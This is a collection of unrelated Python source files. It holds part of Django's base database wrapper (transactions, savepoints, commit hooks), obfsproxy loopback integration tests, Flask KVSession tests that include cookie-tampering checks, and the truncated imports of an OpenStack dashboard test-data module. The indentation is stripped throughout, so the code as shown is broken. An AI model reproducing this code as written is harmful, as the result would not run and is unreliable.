# Should we run the on-commit hooks the next time set_autocommit(True)
# is called?
self.run_commit_hooks_on_set_autocommit_on = False
# A stack of wrappers to be invoked around execute()/executemany()
# calls. Each entry is a function taking five arguments: execute, sql,
# params, many, and context. It's the function's responsibility to
# call execute(sql, params, many, context).
self.execute_wrappers = []
self.client = self.client_class(self)
self.creation = self.creation_class(self)
self.features = self.features_class(self)
self.introspection = self.introspection_class(self)
self.ops = self.ops_class(self)
self.validation = self.validation_class(self)
def ensure_timezone(self):
"""
Ensure the connection's timezone is set to `self.timezone_name` and
return whether it changed or not.
"""
return False
@cached_property
def timezone(self):
"""
Time zone for datetimes stored as naive values in the database.
Return a tzinfo object or None.
This is only needed when time zone support is enabled and the database
doesn't support time zones. (When the database supports time zones,
the adapter handles aware datetimes so Django doesn't need to.)
"""
if not settings.USE_TZ:
return None
elif self.features.supports_timezones:
return None
elif self.settings_dict['TIME_ZONE'] is None:
return timezone.utc
else:
return pytz.timezone(self.settings_dict['TIME_ZONE'])
@cached_property
def timezone_name(self):
"""
Name of the time zone of the database connection.
"""
if not settings.USE_TZ:
return settings.TIME_ZONE
elif self.settings_dict['TIME_ZONE'] is None:
return 'UTC'
else:
return self.settings_dict['TIME_ZONE']
@property
def queries_logged(self):
return self.force_debug_cursor or settings.DEBUG
@property
def queries(self):
if len(self.queries_log) == self.queries_log.maxlen:
warnings.warn(
"Limit for query logging exceeded, only the last {} queries "
"will be returned.".format(self.queries_log.maxlen))
return list(self.queries_log)
# ##### Backend-specific methods for creating connections and cursors #####
def get_connection_params(self):
"""Return a dict of parameters suitable for get_new_connection."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_connection_params() method')
def get_new_connection(self, conn_params):
"""Open a connection to the database."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_new_connection() method')
def init_connection_state(self):
"""Initialize the database connection settings."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an init_connection_state() method')
def create_cursor(self, name=None):
"""Create a cursor. Assume that a connection is established."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a create_cursor() method')
# ##### Backend-specific methods for creating connections #####
def connect(self):
"""Connect to the database. Assume that the connection is closed."""
# Check for invalid configurations.
self.check_settings()
# In case the previous connection was closed while in an atomic block
self.in_atomic_block = False
self.savepoint_ids = []
self.needs_rollback = False
# Reset parameters defining when to close the connection
max_age = self.settings_dict['CONN_MAX_AGE']
self.close_at = None if max_age is None else time.time() + max_age
self.closed_in_transaction = False
self.errors_occurred = False
# Establish the connection
conn_params = self.get_connection_params()
self.connection = self.get_new_connection(conn_params)
self.set_autocommit(self.settings_dict['AUTOCOMMIT'])
self.init_connection_state()
connection_created.send(sender=self.__class__, connection=self)
self.run_on_commit = []
def check_settings(self):
if self.settings_dict['TIME_ZONE'] is not None:
if not settings.USE_TZ:
raise ImproperlyConfigured(
"Connection '%s' cannot set TIME_ZONE because USE_TZ is "
"False." % self.alias)
elif self.features.supports_timezones:
raise ImproperlyConfigured(
"Connection '%s' cannot set TIME_ZONE because its engine "
"handles time zones conversions natively." % self.alias)
def ensure_connection(self):
"""Guarantee that a connection to the database is established."""
if self.connection is None:
with self.wrap_database_errors:
self.connect()
# ##### Backend-specific wrappers for PEP-249 connection methods #####
def _prepare_cursor(self, cursor):
"""
Validate the connection is usable and perform database cursor wrapping.
"""
self.validate_thread_sharing()
if self.queries_logged:
wrapped_cursor = self.make_debug_cursor(cursor)
else:
wrapped_cursor = self.make_cursor(cursor)
return wrapped_cursor
def _cursor(self, name=None):
self.ensure_connection()
with self.wrap_database_errors:
return self._prepare_cursor(self.create_cursor(name))
def _commit(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.commit()
def _rollback(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.rollback()
def _close(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.close()
# ##### Generic wrappers for PEP-249 connection methods #####
def cursor(self):
"""Create a cursor, opening a connection if necessary."""
return self._cursor()
def commit(self):
"""Commit a transaction and reset the dirty flag."""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._commit()
# A successful commit means that the database connection works.
self.errors_occurred = False
self.run_commit_hooks_on_set_autocommit_on = True
def rollback(self):
"""Roll back a transaction and reset the dirty flag."""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._rollback()
# A successful rollback means that the database connection works.
self.errors_occurred = False
self.needs_rollback = False
self.run_on_commit = []
def close(self):
"""Close the connection to the database."""
self.validate_thread_sharing()
self.run_on_commit = []
# Don't call validate_no_atomic_block() to avoid making it difficult
# to get rid of a connection in an invalid state. The next connect()
# will reset the transaction state anyway.
if self.closed_in_transaction or self.connection is None:
return
try:
self._close()
finally:
if self.in_atomic_block:
self.closed_in_transaction = True
self.needs_rollback = True
else:
self.connection = None
# ##### Backend-specific savepoint management methods #####
def _savepoint(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_create_sql(sid))
def _savepoint_rollback(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_rollback_sql(sid))
def _savepoint_commit(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_commit_sql(sid))
def _savepoint_allowed(self):
# Savepoints cannot be created outside a transaction
return self.features.uses_savepoints and not self.get_autocommit()
# ##### Generic savepoint management methods #####
def savepoint(self):
"""
Create a savepoint inside the current transaction. Return an
identifier for the savepoint that will be used for the subsequent
rollback or commit. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
thread_ident = _thread.get_ident()
tid = str(thread_ident).replace('-', '')
self.savepoint_state += 1
sid = "s%s_x%d" % (tid, self.savepoint_state)
self.validate_thread_sharing()
self._savepoint(sid)
return sid
def savepoint_rollback(self, sid):
"""
Roll back to a savepoint. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_rollback(sid)
# Remove any callbacks registered while this savepoint was active.
self.run_on_commit = [
(sids, func) for (sids, func) in self.run_on_commit if sid not in sids
]
def savepoint_commit(self, sid):
"""
Release a savepoint. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_commit(sid)
def clean_savepoints(self):
"""
Reset the counter used to generate unique savepoint ids in this thread.
"""
self.savepoint_state = 0
# ##### Backend-specific transaction management methods #####
def _set_autocommit(self, autocommit):
"""
Backend-specific implementation to enable or disable autocommit.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _set_autocommit() method')
# ##### Generic transaction management methods #####
def get_autocommit(self):
"""Get the autocommit state."""
self.ensure_connection()
return self.autocommit
def set_autocommit(self, autocommit, force_begin_transaction_with_broken_autocommit=False):
"""
Enable or disable autocommit.
The usual way to start a transaction is to turn autocommit off.
SQLite does not properly start a transaction when disabling
autocommit. To avoid this buggy behavior and to actually enter a new
transaction, an explcit BEGIN is required. Using
force_begin_transaction_with_broken_autocommit=True will issue an
explicit BEGIN with SQLite. This option will be ignored for other
backends.
"""
self.validate_no_atomic_block()
self.ensure_connection()
start_transaction_under_autocommit = (
force_begin_transaction_with_broken_autocommit and not autocommit and
hasattr(self, '_start_transaction_under_autocommit')
)
if start_transaction_under_autocommit:
self._start_transaction_under_autocommit()
else:
self._set_autocommit(autocommit)
self.autocommit = autocommit
if autocommit and self.run_commit_hooks_on_set_autocommit_on:
self.run_and_clear_commit_hooks()
self.run_commit_hooks_on_set_autocommit_on = False
def get_rollback(self):
"""Get the "needs rollback" flag -- for *advanced use* only."""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
return self.needs_rollback
def set_rollback(self, rollback):
"""
Set or unset the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
self.needs_rollback = rollback
def validate_no_atomic_block(self):
"""Raise an error if an atomic block is active."""
if self.in_atomic_block:
raise TransactionManagementError(
"This is forbidden when an 'atomic' block is active.")
def validate_no_broken_transaction(self):
if self.needs_rollback:
raise TransactionManagementError(
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block.")
# ##### Foreign key constraints checks handling #####
@contextmanager
def constraint_checks_disabled(self):
"""
Disable foreign key constraint checking.
"""
disabled = self.disable_constraint_checking()
try:
yield
finally:
if disabled:
self.enable_constraint_checking()
def disable_constraint_checking(self):
"""
Backends can implement as needed to temporarily disable foreign key
constraint checking. Should return True if the constraints were
disabled and will need to be reenabled.
"""
return False
def enable_constraint_checking(self):
"""
Backends can implement as needed to re-enable foreign key constraint
checking.
"""
pass
def check_constraints(self, table_names=None):
"""
Backends can override this method if they can apply constraint
checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE"). Should raise an
IntegrityError if any invalid foreign key references are encountered.
"""
pass
# ##### Connection termination handling #####
def is_usable(self):
"""
Test if the database connection is usable.
This method may assume that self.connection is not None.
Actual implementations should take care not to raise exceptions
as that may prevent Django from recycling unusable connections.
"""
raise NotImplementedError(
"subclasses of BaseDatabaseWrapper may require an is_usable() method")
def close_if_unusable_or_obsolete(self):
"""
Close the current connection if unrecoverable errors have occurred
or if it outlived its maximum age.
"""
if self.connection is not None:
# If the application didn't restore the original autocommit setting,
# don't take chances, drop the connection.
if self.get_autocommit() != self.settings_dict['AUTOCOMMIT']:
self.close()
return
# If an exception other than DataError or IntegrityError occurred
# since the last commit / rollback, check if the connection works.
if self.errors_occurred:
if self.is_usable():
self.errors_occurred = False
else:
self.close()
return
if self.close_at is not None and time.time() >= self.close_at:
self.close()
return
# ##### Thread safety handling #####
def validate_thread_sharing(self):
"""
Validate that the connection isn't accessed by another thread than the
one which originally created it, unless the connection was explicitly
authorized to be shared between threads (via the `allow_thread_sharing`
property). Raise an exception if the validation fails.
"""
if not (self.allow_thread_sharing or self._thread_ident == _thread.get_ident()):
raise DatabaseError(
"DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, _thread.get_ident())
)
# ##### Miscellaneous #####
def prepare_database(self):
"""
Hook to do any database check or preparation, generally called before
migrating a project or an app.
"""
pass
@cached_property
def wrap_database_errors(self):
"""
Context manager and decorator that re-throws backend-specific database
exceptions using Django's common wrappers.
"""
return DatabaseErrorWrapper(self)
def chunked_cursor(self):
"""
Return a cursor that tries to avoid caching in the database (if
supported by the database), otherwise return a regular cursor.
"""
return self.cursor()
def make_debug_cursor(self, cursor):
"""Create a cursor that logs all queries in self.queries_log."""
return utils.CursorDebugWrapper(cursor, self)
def make_cursor(self, cursor):
"""Create a cursor without debug logging."""
return utils.CursorWrapper(cursor, self)
@contextmanager
def temporary_connection(self):
"""
Context manager that ensures that a connection is established, and
if it opened one, closes it to avoid leaving a dangling connection.
This is useful for operations outside of the request-response cycle.
Provide a cursor: with self.temporary_connection() as cursor: ...
"""
must_close = self.connection is None
try:
with self.cursor() as cursor:
yield cursor
finally:
if must_close:
self.close()
@property
def _nodb_connection(self):
"""
Return an alternative connection to be used when there is no need to
access the main database, specifically for test db creation/deletion.
This also prevents the production database from being exposed to
potential child threads while (or after) the test database is destroyed.
Refs #10868, #17786, #16969.
"""
return self.__class__(
{**self.settings_dict, 'NAME': None},
alias=NO_DB_ALIAS,
allow_thread_sharing=False,
)
def schema_editor(self, *args, **kwargs):
"""
Return a new instance of this backend's SchemaEditor.
"""
if self.SchemaEditorClass is None:
raise NotImplementedError(
'The SchemaEditorClass attribute of this database wrapper is still None')
return self.SchemaEditorClass(self, *args, **kwargs)
def on_commit(self, func):
if self.in_atomic_block:
# Transaction in progress; save for execution on commit.
self.run_on_commit.append((set(self.savepoint_ids), func))
elif not self.get_autocommit():
raise TransactionManagementError('on_commit() cannot be used in manual transaction management')
else:
# No transaction in progress and in autocommit mode; execute
# immediately.
func()
def run_and_clear_commit_hooks(self):
self.validate_no_atomic_block()
current_run_on_commit = self.run_on_commit
self.run_on_commit = []
while current_run_on_commit:
sids, func = current_run_on_commit.pop(0)
func()
@contextmanager
def execute_wrapper(self, wrapper):
"""
Return a context manager under which the wrapper is applied to suitable
database query executions.
"""
self.execute_wrappers.append(wrapper)
try:
yield
finally:
self.execute_wrappers.pop()
def copy(self, alias=None, allow_thread_sharing=None):
"""
Return a copy of this connection.
For tests that require two connections to the same database.
"""
settings_dict = copy.deepcopy(self.settings_dict)
if alias is None:
alias = self.alias
if allow_thread_sharing is None:
allow_thread_sharing = self.allow_thread_sharing
return type(self)(settings_dict, alias, allow_thread_sharing)
| |
#!/usr/bin/python
"""@package tester.py.in
Integration tests for obfsproxy.
The obfsproxy binary is assumed to exist in the current working
directory, and you need to have Python 2.6 or better (but not 3).
You need to be able to make connections to arbitrary high-numbered
TCP ports on the loopback interface.
"""
import difflib
import errno
import multiprocessing
import Queue
import re
import signal
import socket
import struct
import subprocess
import time
import traceback
import unittest
def diff(label, expected, received):
"""
Helper: generate unified-format diffs between two named strings.
Pythonic escaped-string syntax is used for unprintable characters.
"""
if expected == received:
return ""
else:
return (label + "\n"
+ "\n".join(s.encode("string_escape")
for s in
difflib.unified_diff(expected.split("\n"),
received.split("\n"),
"expected", "received",
lineterm=""))
+ "\n")
class Obfsproxy(subprocess.Popen):
"""
Helper: Run obfsproxy instances and confirm that they have
completed without any errors.
"""
def __init__(self, *args, **kwargs):
"""Spawns obfsproxy with 'args'"""
argv = ["../../obfsproxy.py", "--no-log"]
if len(args) == 1 and (isinstance(args[0], list) or
isinstance(args[0], tuple)):
argv.extend(args[0])
else:
argv.extend(args)
subprocess.Popen.__init__(self, argv,
stdin=open("/dev/null", "r"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**kwargs)
severe_error_re = re.compile(r"\[(?:warn|err(?:or)?)\]")
def check_completion(self, label, force_stderr):
"""
Checks the output and exit status of obfsproxy to see if
everything went fine.
Returns an empty string if the test was good, otherwise it
returns a report that should be printed to the user.
"""
if self.poll() is None:
self.send_signal(signal.SIGINT)
(out, err) = self.communicate()
report = ""
def indent(s):
return "| " + "\n| ".join(s.strip().split("\n"))
# exit status should be zero
if self.returncode > 0:
report += label + " exit code: %d\n" % self.returncode
elif self.returncode < 0:
report += label + " killed: signal %d\n" % -self.returncode
# there should be nothing on stdout
if out != "":
report += label + " stdout:\n%s\n" % indent(out)
# there will be debugging messages on stderr, but there should be
# no [warn], [err], or [error] messages.
if force_stderr or self.severe_error_re.search(err):
report += label + " stderr:\n%s\n" % indent(err)
return report
def stop(self):
"""Terminates obfsproxy."""
if self.poll() is None:
self.terminate()
def connect_with_retry(addr):
"""
Helper: Repeatedly try to connect to the specified server socket
until either it succeeds or one full second has elapsed. (Surely
there is a better way to do this?)
"""
retry = 0
while True:
try:
return socket.create_connection(addr)
except socket.error, e:
if e.errno != errno.ECONNREFUSED: raise
if retry == 20: raise
retry += 1
time.sleep(0.05)
SOCKET_TIMEOUT = 1.0
class ReadWorker(object):
"""
Helper: In a separate process (to avoid deadlock), listen on a
specified socket. The first time something connects to that socket,
read all available data, stick it in a string, and post the string
to the output queue. Then close both sockets and exit.
"""
@staticmethod
def work(address, oq):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(address)
listener.listen(1)
(conn, remote) = listener.accept()
listener.close()
conn.settimeout(SOCKET_TIMEOUT)
data = ""
try:
while True:
chunk = conn.recv(4096)
if chunk == "": break
data += chunk
except socket.timeout:
pass
except Exception, e:
data += "|RECV ERROR: " + e
conn.close()
oq.put(data)
def __init__(self, address):
self.oq = multiprocessing.Queue()
self.worker = multiprocessing.Process(target=self.work,
args=(address, self.oq))
self.worker.start()
def get(self):
"""
Get a chunk of data from the ReadWorker's queue.
"""
rv = self.oq.get(timeout=SOCKET_TIMEOUT+0.1)
self.worker.join()
return rv
def stop(self):
if self.worker.is_alive(): self.worker.terminate()
# Right now this is a direct translation of the former int_test.sh
# (except that I have fleshed out the SOCKS test a bit).
# It will be made more general and parametric Real Soon.
ENTRY_PORT = 4999
SERVER_PORT = 5000
EXIT_PORT = 5001
#
# Test base classes. They do _not_ inherit from unittest.TestCase
# so that they are not scanned directly for test functions (some of
# them do provide test functions, but not in a usable state without
# further code from subclasses).
#
class DirectTest(object):
def setUp(self):
self.output_reader = ReadWorker(("127.0.0.1", EXIT_PORT))
self.obfs_server = Obfsproxy(self.server_args)
self.obfs_client = Obfsproxy(self.client_args)
self.input_chan = connect_with_retry(("127.0.0.1", ENTRY_PORT))
self.input_chan.settimeout(SOCKET_TIMEOUT)
def tearDown(self):
self.obfs_client.stop()
self.obfs_server.stop()
self.output_reader.stop()
self.input_chan.close()
def test_direct_transfer(self):
# Open a server and a simple client (in the same process) and
# transfer a file. Then check whether the output is the same
# as the input.
self.input_chan.sendall(TEST_FILE)
try:
output = self.output_reader.get()
except Queue.Empty:
output = ""
self.input_chan.close()
report = diff("errors in transfer:", TEST_FILE, output)
report += self.obfs_client.check_completion("obfsproxy client", report!="")
report += self.obfs_server.check_completion("obfsproxy server", report!="")
if report != "":
self.fail("\n" + report)
#
# Concrete test classes specialize the above base classes for each protocol.
#
class DirectDummy(DirectTest, unittest.TestCase):
server_args = ("dummy", "server",
"127.0.0.1:%d" % SERVER_PORT,
"--dest=127.0.0.1:%d" % EXIT_PORT)
client_args = ("dummy", "client",
"127.0.0.1:%d" % ENTRY_PORT,
"--dest=127.0.0.1:%d" % SERVER_PORT)
class DirectB64(DirectTest, unittest.TestCase):
server_args = ("b64", "server",
"127.0.0.1:%d" % SERVER_PORT,
"--dest=127.0.0.1:%d" % EXIT_PORT)
client_args = ("b64", "client",
"127.0.0.1:%d" % ENTRY_PORT,
"--dest=127.0.0.1:%d" % SERVER_PORT)
TEST_FILE = """\
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
In obfuscatory age geeky warfare did I wage
For hiding bits from nasty censors' sight
I was hacker to my set in that dim dark age of net
And I hacked from noon till three or four at night
Then a rival from Helsinki said my protocol was dinky
So I flamed him with a condescending laugh,
Saying his designs for stego might as well be made of lego
And that my bikeshed was prettier by half.
But Claude Shannon saw my shame. From his noiseless channel came
A message sent with not a wasted byte
"There are nine and sixty ways to disguise communiques
And RATHER MORE THAN ONE OF THEM IS RIGHT"
(apologies to Rudyard Kipling.)
"""
if __name__ == '__main__':
unittest.main()
| |
#!/usr/bin/env python
# coding=utf8
from datetime import timedelta, datetime
import json
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import time
from flask import Flask, session
from flaskext.kvsession import SessionID, KVSessionExtension, KVSession
from itsdangerous import Signer
from simplekv.memory import DictStore
class TestSessionID(unittest.TestCase):
def test_serialize(self):
t = int(time.time())
dt = datetime.utcfromtimestamp(t)
sid = SessionID(1234, dt)
self.assertEqual('%x_%x' % (1234, t), sid.serialize())
def test_automatic_created_date(self):
start = datetime.utcnow()
sid = SessionID(0)
end = datetime.utcnow()
self.assertTrue(start <= sid.created <= end)
def test_serialize_unserialize(self):
dt = datetime(2011, 7, 9, 13, 14, 15)
id = 59034
sid = SessionID(id, dt)
data = sid.serialize()
SessionID(123)
restored_sid = sid.unserialize(data)
self.assertEqual(sid.id, restored_sid.id)
self.assertEqual(sid.created, restored_sid.created)
def create_app(store):
app = Flask(__name__)
app.kvsession = KVSessionExtension(store, app)
@app.route('/')
def index():
return 'nothing to see here, move along'
@app.route('/store-in-session/<key>/<value>/')
def store(key, value):
session[key] = value
return 'stored %r at %r' % (value, key)
@app.route('/store-datetime/')
def store_datetime():
t = datetime(2011, 8, 10, 15, 46, 00)
session['datetime_key'] = t
return 'ok'
@app.route('/delete-from-session/<key>/')
def delete(key):
del session[key]
return 'deleted %r' % key
@app.route('/destroy-session/')
def destroy():
session.destroy()
return 'session destroyed'
@app.route('/make-session-permanent/')
def make_permanent():
session.permanent = True
return 'made session permanent'
@app.route('/dump-session/')
def dump():
return json.dumps(dict(session))
@app.route('/dump-datetime/')
def dump_datetime():
return str(session['datetime_key'])
@app.route('/regenerate-session/')
def regenerate():
session.regenerate()
return 'session regenerated'
@app.route('/is-kvsession/')
def is_kvsession():
return str(isinstance(session._get_current_object(), KVSession))
@app.route('/is-new-session/')
def is_new_session():
return str(session.new)
return app
class TestSampleApp(unittest.TestCase):
def setUp(self):
self.store = DictStore()
self.app = create_app(self.store)
self.app.config['TESTING'] = True
self.app.config['SECRET_KEY'] = 'devkey'
self.client = self.app.test_client()
def split_cookie(self, rv):
signer = Signer(self.app.secret_key)
cookie_data = rv.headers['Set-Cookie'].split(';', 1)[0]
for cookie in cookie_data.split('&'):
name, value = cookie_data.split('=')
if name == self.app.session_cookie_name:
unsigned_value = signer.unsign(value)
return unsigned_value.split('_')
def get_session_cookie(self):
return self.client.cookie_jar.\
_cookies['localhost.local']['/']['session']
def test_app_setup(self):
pass
def test_app_request_no_extras(self):
rv = self.client.get('/')
self.assertIn('move along', rv.data)
def test_no_session_usage_uses_no_storage(self):
self.client.get('/')
self.client.get('/')
self.assertEqual({}, self.store.d)
def test_session_usage(self):
self.client.get('/store-in-session/foo/bar/')
self.assertNotEqual({}, self.store.d)
def test_proper_cookie_received(self):
rv = self.client.get('/store-in-session/bar/baz/')
sid, created = self.split_cookie(rv)
self.assertNotEqual(int(created, 16), 0)
# check sid in store
key = '%s_%s' % (sid, created)
self.assertIn(key, self.store)
def test_session_restores_properly(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/store-in-session/k2/value2/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
self.assertEqual(s['k2'], 'value2')
def test_manipulation_caught(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
# now manipulate cookie
cookie = self.get_session_cookie()
v_orig = cookie.value
for i in xrange(len(v_orig)):
broken_value = v_orig[:i] +\
('a' if v_orig[i] != 'a' else 'b') +\
v_orig[i + 1:]
cookie.value = broken_value
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s, {})
def test_can_change_values(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
rv = self.client.get('/store-in-session/k1/value2/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value2')
def test_can_delete_values(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/store-in-session/k2/value2/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
self.assertEqual(s['k2'], 'value2')
rv = self.client.get('/delete-from-session/k1/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertNotIn('k1', s)
self.assertEqual(s['k2'], 'value2')
def test_can_destroy_sessions(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/store-in-session/k2/value2/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
self.assertEqual(s['k2'], 'value2')
# destroy session
rv = self.client.get('/destroy-session/')
self.assertIn('session destroyed', rv.data)
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s, {})
def test_session_expires(self):
# set expiration to 1 second
self.app.permanent_session_lifetime = timedelta(seconds=1)
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
rv = self.client.get('/make-session-permanent/')
# assert that the session has a non-zero timestamp
sid, created = self.split_cookie(rv)
self.assertNotEqual(0, int(created, 16))
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
# sleep two seconds
time.sleep(2)
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s, {})
def test_session_cleanup_works(self):
# set expiration to 1 second
self.app.permanent_session_lifetime = timedelta(seconds=1)
self.client.get('/store-in-session/k1/value1/')
self.client.get('/make-session-permanent/')
# assume there is a valid session, even after cleanup
self.assertNotEqual({}, self.store.d)
self.app.kvsession.cleanup_sessions(self.app)
self.assertNotEqual({}, self.store.d)
time.sleep(2)
self.app.kvsession.cleanup_sessions(self.app)
self.assertEqual({}, self.store.d)
def test_can_regenerate_session(self):
self.client.get('/store-in-session/k1/value1/')
self.assertEqual(1, len(self.store.d))
key = self.store.d.keys()[0]
# now regenerate
self.client.get('/regenerate-session/')
self.assertEqual(1, len(self.store.d))
new_key = self.store.d.keys()[0]
self.assertNotEqual(new_key, key)
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
def test_works_without_secret_key_if_session_not_used(self):
self.app = create_app(self.store)
self.app.config['TESTING'] = True
self.client = self.app.test_client()
self.client.get('/')
def test_correct_error_reporting_with_no_secret_key(self):
self.app = create_app(self.store)
self.app.config['TESTING'] = True
self.client = self.app.test_client()
with self.assertRaises(RuntimeError):
self.client.get('/store-in-session/k1/value1/')
def test_can_store_datetime(self):
rv = self.client.get('/store-datetime/')
rv = self.client.get('/dump-datetime/')
self.assertEqual(rv.data, '2011-08-10 15:46:00')
def test_missing_session_causes_new_empty_session(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
self.store.d.clear()
rv = self.client.get('/dump-session/')
self.assertEqual(rv.data, '{}')
rv = self.client.get('/is-kvsession/')
self.assertEqual('True', rv.data)
def test_manipulated_session_causes_new_empty_session(self):
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
cookie = self.get_session_cookie()
cookie.value += 'x'
rv = self.client.get('/dump-session/')
self.assertEqual(rv.data, '{}')
rv = self.client.get('/is-kvsession/')
self.assertEqual('True', rv.data)
def test_expired_session_causes_new_empty_session(self):
self.app.permanent_session_lifetime = timedelta(seconds=1)
rv = self.client.get('/store-in-session/k1/value1/')
rv = self.client.get('/make-session-permanent/')
# assert that the session has a non-zero timestamp
sid, created = self.split_cookie(rv)
self.assertNotEqual(0, int(created, 16))
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s['k1'], 'value1')
# sleep two seconds
time.sleep(2)
# we should have a new session now
rv = self.client.get('/is-new-session/')
self.assertEqual(str(True), rv.data)
rv = self.client.get('/dump-session/')
s = json.loads(rv.data)
self.assertEqual(s, {})
def test_expired_made_permanent_causes_no_exception(self):
self.app.permanent_session_lifetime = timedelta(seconds=1)
rv = self.client.get('/store-in-session/k1/value1/')
# sleep two seconds
time.sleep(2)
rv = self.client.get('/make-session-permanent/')
def test_permanent_session_cookies_are_permanent(self):
rv = self.client.get('/store-in-session/k1/value1/')
sid, created = self.split_cookie(rv)
# session cookie
self.assertIsNone(self.get_session_cookie().expires)
rv = self.client.get('/make-session-permanent/')
# now it needs to be permanent
self.assertIsNotNone(self.get_session_cookie().expires)
def test_new_delayed_construction(self):
app = Flask(__name__)
ext = KVSessionExtension()
with self.assertRaises(ValueError):
ext.init_app(app)
ext.init_app(app, self.store)
self.assertIs(self.store, app.kvsession_store)
def test_new_delayed_construction_with_default(self):
app = Flask(__name__)
ext = KVSessionExtension(self.store)
ext.init_app(app)
self.assertIs(self.store, app.kvsession_store)
# the code below should, in theory, trigger the problem of regenerating a
# session before it has been created, however, it doesn't
class TestFirstRequestRegenerate(unittest.TestCase):
def test_first_request(self):
store = DictStore()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'topsecret'
KVSessionExtension(store, app)
@app.route('/')
def index():
session.regenerate()
return 'OK'
client = app.test_client()
client.get('/')
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from datetime import timedelta # noqa
from django.conf import settings
from django.utils import datetime_safe
from keystoneclient import access
from keystoneclient.v2_0 import ec2
from keystoneclient.v2_0 import roles
from keystoneclient.v2_0 import tenants
from keystoneclient.v2_0 import users
from keystoneclient.v3 import domains
from keystoneclient.v3 import groups
from openstack_auth import user as auth_user
from openstack_dashboard.test.test_data import utils
